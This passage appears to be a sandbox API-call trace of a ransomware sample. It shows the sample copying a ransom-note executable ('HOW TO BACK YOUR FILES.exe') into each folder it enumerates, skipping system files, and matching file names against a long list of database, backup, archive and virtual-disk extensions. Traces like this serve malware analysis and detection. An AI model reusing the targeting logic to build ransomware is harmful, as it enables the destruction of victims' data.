ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.296] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.296] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.296] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.296] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.296] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c2efc20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.296] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.296] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c2efc20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0083.296] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0083.296] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0083.296] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Mozilla", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Mozilla") returned="C:\\Users\\All Users\\Mozilla" [0083.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccf68 | out: hHeap=0x2b0000) returned 1 [0083.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0083.296] lstrlenW (lpString="C:\\Users\\All Users\\Mozilla") returned 26 [0083.296] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Mozilla" | out: lpString1="C:\\Users\\All Users\\Mozilla") returned="C:\\Users\\All Users\\Mozilla" [0083.296] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.297] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Mozilla\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\mozilla\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.297] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.297] GetLastError () returned 0x0 [0083.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.297] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.297] CloseHandle (hObject=0x120) returned 1 [0083.297] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.297] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.297] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.298] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.298] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.298] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.298] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.298] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.298] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.298] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.298] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.298] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c2efc20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.298] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.298] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="aoldtz.exe") returned 1 [0083.298] lstrcmpiW (lpString1="logs", lpString2=".") returned 1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="..") returned 1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="windows") returned -1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="bootmgr") returned 1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="temp") returned -1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="pagefile.sys") returned -1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="boot") returned 1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="ids.txt") returned 1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="ntuser.dat") returned -1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="perflogs") returned -1 [0083.298] lstrcmpiW (lpString1="logs", lpString2="MSBuild") returned -1 [0083.298] lstrlenW (lpString="logs") returned 4 [0083.298] lstrlenW (lpString="C:\\Users\\All Users\\Mozilla\\*") returned 28 [0083.298] lstrcpyW (in: lpString1=0x2cce436, lpString2="logs" | out: lpString1="logs") returned="logs" [0083.298] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0083.298] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e63f0 [0083.299] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0083.299] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0083.299] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.299] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0083.299] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Mozilla\\logs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Mozilla\\logs") returned="C:\\Users\\All Users\\Mozilla\\logs" [0083.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e63f0 | out: hHeap=0x2b0000) returned 1 [0083.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0083.299] lstrlenW (lpString="C:\\Users\\All Users\\Mozilla\\logs") returned 31 [0083.299] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Mozilla\\logs" | out: lpString1="C:\\Users\\All Users\\Mozilla\\logs") returned="C:\\Users\\All Users\\Mozilla\\logs" [0083.299] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.299] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Mozilla\\logs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\mozilla\\logs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.299] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.299] GetLastError () returned 0x0 [0083.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.300] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.300] CloseHandle (hObject=0x120) returned 1 [0083.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.300] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.300] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.300] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.300] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.300] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.300] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.300] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.300] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.300] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.300] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.300] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c2efc20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.300] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.300] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice-install.log", cAlternateFileName="MAINTE~1.LOG")) returned 1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="aoldtz.exe") returned 1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2=".") returned 1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="..") returned 1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="windows") returned -1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="bootmgr") returned 1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="temp") returned -1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="pagefile.sys") returned -1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="boot") returned 1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="ids.txt") returned 1 [0083.300] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="ntuser.dat") returned -1 [0083.301] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="perflogs") returned -1 [0083.301] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="MSBuild") returned -1 [0083.301] lstrlenW (lpString="maintenanceservice-install.log") returned 30 [0083.301] lstrlenW (lpString="C:\\Users\\All Users\\Mozilla\\logs\\*") returned 33 [0083.301] lstrcpyW (in: lpString1=0x2cce440, lpString2="maintenanceservice-install.log" | out: lpString1="maintenanceservice-install.log") returned="maintenanceservice-install.log" [0083.301] lstrlenW (lpString="maintenanceservice-install.log") returned 30 [0083.301] lstrlenW (lpString="Ares865") returned 7 [0083.301] lstrcmpiW (lpString1="all.log", lpString2="Ares865") returned -1 [0083.301] lstrlenW (lpString=".dll") returned 4 [0083.301] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2=".dll") returned 1 [0083.301] lstrlenW (lpString=".lnk") returned 4 [0083.301] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2=".lnk") returned 1 [0083.301] lstrlenW (lpString=".ini") returned 4 [0083.301] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2=".ini") returned 1 [0083.301] lstrlenW (lpString=".sys") returned 4 [0083.301] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2=".sys") returned 1 [0083.301] lstrlenW (lpString="maintenanceservice-install.log") returned 30 [0083.301] lstrlenW (lpString="bak") returned 3 [0083.301] lstrcmpiW (lpString1="log", lpString2="bak") returned 1 [0083.301] lstrlenW (lpString="ba_") returned 3 [0083.301] lstrcmpiW (lpString1="log", lpString2="ba_") returned 1 [0083.301] lstrlenW (lpString="dbb") returned 3 [0083.301] lstrcmpiW (lpString1="log", lpString2="dbb") returned 1 [0083.301] lstrlenW (lpString="vmdk") returned 4 [0083.301] lstrcmpiW (lpString1=".log", lpString2="vmdk") returned -1 [0083.301] lstrlenW (lpString="rar") returned 3 [0083.301] lstrcmpiW (lpString1="log", lpString2="rar") returned -1 [0083.301] lstrlenW (lpString="zip") returned 3 [0083.301] lstrcmpiW (lpString1="log", lpString2="zip") returned -1 [0083.301] lstrlenW (lpString="tgz") returned 3 [0083.301] lstrcmpiW (lpString1="log", lpString2="tgz") returned -1 [0083.301] lstrlenW (lpString="vbox") returned 4 [0083.301] lstrcmpiW (lpString1=".log", lpString2="vbox") returned -1 [0083.301] lstrlenW (lpString="vdi") returned 3 [0083.301] lstrcmpiW (lpString1="log", lpString2="vdi") returned -1 [0083.301] lstrlenW (lpString="vhd") returned 3 [0083.301] lstrcmpiW (lpString1="log", lpString2="vhd") returned -1 [0083.301] lstrlenW (lpString="vhdx") returned 4 [0083.302] lstrcmpiW (lpString1=".log", lpString2="vhdx") returned -1 [0083.302] lstrlenW (lpString="avhd") returned 4 [0083.302] lstrcmpiW (lpString1=".log", lpString2="avhd") returned -1 [0083.302] lstrlenW (lpString="db") returned 2 [0083.302] lstrcmpiW (lpString1="og", lpString2="db") returned 1 [0083.302] lstrlenW (lpString="db2") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="db2") returned 1 [0083.302] lstrlenW (lpString="db3") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="db3") returned 1 [0083.302] lstrlenW (lpString="dbf") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="dbf") returned 1 [0083.302] lstrlenW (lpString="mdf") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="mdf") returned -1 [0083.302] lstrlenW (lpString="mdb") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="mdb") returned -1 [0083.302] lstrlenW (lpString="sql") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="sql") returned -1 [0083.302] lstrlenW (lpString="sqlite") returned 6 [0083.302] lstrcmpiW (lpString1="ll.log", lpString2="sqlite") returned -1 [0083.302] lstrlenW (lpString="sqlite3") returned 7 [0083.302] lstrcmpiW (lpString1="all.log", lpString2="sqlite3") returned -1 [0083.302] lstrlenW (lpString="sqlitedb") returned 8 [0083.302] lstrcmpiW (lpString1="tall.log", lpString2="sqlitedb") returned 1 [0083.302] lstrlenW (lpString="xml") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="xml") returned -1 [0083.302] lstrlenW (lpString="$er") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="$er") returned 1 [0083.302] lstrlenW (lpString="4dd") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="4dd") returned 1 [0083.302] lstrlenW (lpString="4dl") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="4dl") returned 1 [0083.302] lstrlenW (lpString="^^^") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="^^^") returned 1 [0083.302] lstrlenW (lpString="abs") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="abs") returned 1 [0083.302] lstrlenW (lpString="abx") returned 3 [0083.302] lstrcmpiW (lpString1="log", lpString2="abx") returned 1 [0083.303] lstrlenW (lpString="accdb") returned 5 [0083.303] lstrcmpiW (lpString1="l.log", lpString2="accdb") returned 1 [0083.303] lstrlenW (lpString="accdc") returned 5 [0083.303] lstrcmpiW (lpString1="l.log", lpString2="accdc") returned 1 [0083.303] lstrlenW (lpString="accde") returned 5 [0083.303] lstrcmpiW (lpString1="l.log", lpString2="accde") returned 1 [0083.303] lstrlenW (lpString="accdr") returned 5 [0083.303] lstrcmpiW (lpString1="l.log", lpString2="accdr") returned 1 [0083.303] lstrlenW (lpString="accdt") returned 5 [0083.303] lstrcmpiW (lpString1="l.log", lpString2="accdt") returned 1 [0083.303] lstrlenW (lpString="accdw") returned 5 [0083.303] lstrcmpiW (lpString1="l.log", lpString2="accdw") returned 1 [0083.303] lstrlenW (lpString="accft") returned 5 [0083.303] lstrcmpiW (lpString1="l.log", lpString2="accft") returned 1 [0083.303] lstrlenW (lpString="adb") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0083.303] lstrlenW (lpString="adb") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0083.303] lstrlenW (lpString="ade") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="ade") returned 1 [0083.303] lstrlenW (lpString="adf") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="adf") returned 1 [0083.303] lstrlenW (lpString="adn") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="adn") returned 1 [0083.303] lstrlenW (lpString="adp") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="adp") returned 1 [0083.303] lstrlenW (lpString="alf") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="alf") returned 1 [0083.303] lstrlenW (lpString="ask") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="ask") returned 1 [0083.303] lstrlenW (lpString="btr") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="btr") returned 1 [0083.303] lstrlenW (lpString="cat") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="cat") returned 1 [0083.303] lstrlenW (lpString="cdb") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="cdb") returned 1 [0083.303] lstrlenW (lpString="ckp") returned 3 [0083.303] lstrcmpiW (lpString1="log", lpString2="ckp") returned 1 [0083.303] lstrlenW (lpString="cma") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="cma") returned 1 [0083.304] lstrlenW (lpString="cpd") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="cpd") returned 1 [0083.304] lstrlenW (lpString="dacpac") returned 6 [0083.304] lstrcmpiW (lpString1="ll.log", lpString2="dacpac") returned 1 [0083.304] lstrlenW (lpString="dad") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dad") returned 1 [0083.304] lstrlenW (lpString="dadiagrams") returned 10 [0083.304] lstrcmpiW (lpString1="nstall.log", lpString2="dadiagrams") returned 1 [0083.304] lstrlenW (lpString="daschema") returned 8 [0083.304] lstrcmpiW (lpString1="tall.log", lpString2="daschema") returned 1 [0083.304] lstrlenW (lpString="db-journal") returned 10 [0083.304] lstrcmpiW (lpString1="nstall.log", lpString2="db-journal") returned 1 [0083.304] lstrlenW (lpString="db-shm") returned 6 [0083.304] lstrcmpiW (lpString1="ll.log", lpString2="db-shm") returned 1 [0083.304] lstrlenW (lpString="db-wal") returned 6 [0083.304] lstrcmpiW (lpString1="ll.log", lpString2="db-wal") returned 1 [0083.304] lstrlenW (lpString="dbc") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dbc") returned 1 [0083.304] lstrlenW (lpString="dbs") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dbs") returned 1 [0083.304] lstrlenW (lpString="dbt") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dbt") returned 1 [0083.304] lstrlenW (lpString="dbv") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dbv") returned 1 [0083.304] lstrlenW (lpString="dbx") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dbx") returned 1 [0083.304] lstrlenW (lpString="dcb") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dcb") returned 1 [0083.304] lstrlenW (lpString="dct") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dct") returned 1 [0083.304] lstrlenW (lpString="dcx") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="dcx") returned 1 [0083.304] lstrlenW (lpString="ddl") returned 3 [0083.304] lstrcmpiW (lpString1="log", lpString2="ddl") returned 1 [0083.304] lstrlenW (lpString="dlis") returned 4 [0083.304] lstrcmpiW (lpString1=".log", lpString2="dlis") returned -1 [0083.304] lstrlenW (lpString="dp1") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="dp1") returned 1 [0083.305] lstrlenW (lpString="dqy") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="dqy") returned 1 [0083.305] lstrlenW (lpString="dsk") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="dsk") returned 1 [0083.305] lstrlenW (lpString="dsn") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="dsn") returned 1 [0083.305] lstrlenW (lpString="dtsx") returned 4 [0083.305] lstrcmpiW (lpString1=".log", lpString2="dtsx") returned -1 [0083.305] lstrlenW (lpString="dxl") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="dxl") returned 1 [0083.305] lstrlenW (lpString="eco") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="eco") returned 1 [0083.305] lstrlenW (lpString="ecx") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="ecx") returned 1 [0083.305] lstrlenW (lpString="edb") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="edb") returned 1 [0083.305] lstrlenW (lpString="epim") returned 4 [0083.305] lstrcmpiW (lpString1=".log", lpString2="epim") returned -1 [0083.305] lstrlenW (lpString="fcd") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="fcd") returned 1 [0083.305] lstrlenW (lpString="fdb") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="fdb") returned 1 [0083.305] lstrlenW (lpString="fic") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="fic") returned 1 [0083.305] lstrlenW (lpString="flexolibrary") returned 12 [0083.305] lstrcmpiW (lpString1="-install.log", lpString2="flexolibrary") returned 1 [0083.305] lstrlenW (lpString="fm5") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="fm5") returned 1 [0083.305] lstrlenW (lpString="fmp") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="fmp") returned 1 [0083.305] lstrlenW (lpString="fmp12") returned 5 [0083.305] lstrcmpiW (lpString1="l.log", lpString2="fmp12") returned 1 [0083.305] lstrlenW (lpString="fmpsl") returned 5 [0083.305] lstrcmpiW (lpString1="l.log", lpString2="fmpsl") returned 1 [0083.305] lstrlenW (lpString="fol") returned 3 [0083.305] lstrcmpiW (lpString1="log", lpString2="fol") returned 1 [0083.305] lstrlenW (lpString="fp3") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="fp3") returned 1 [0083.306] lstrlenW (lpString="fp4") returned 3 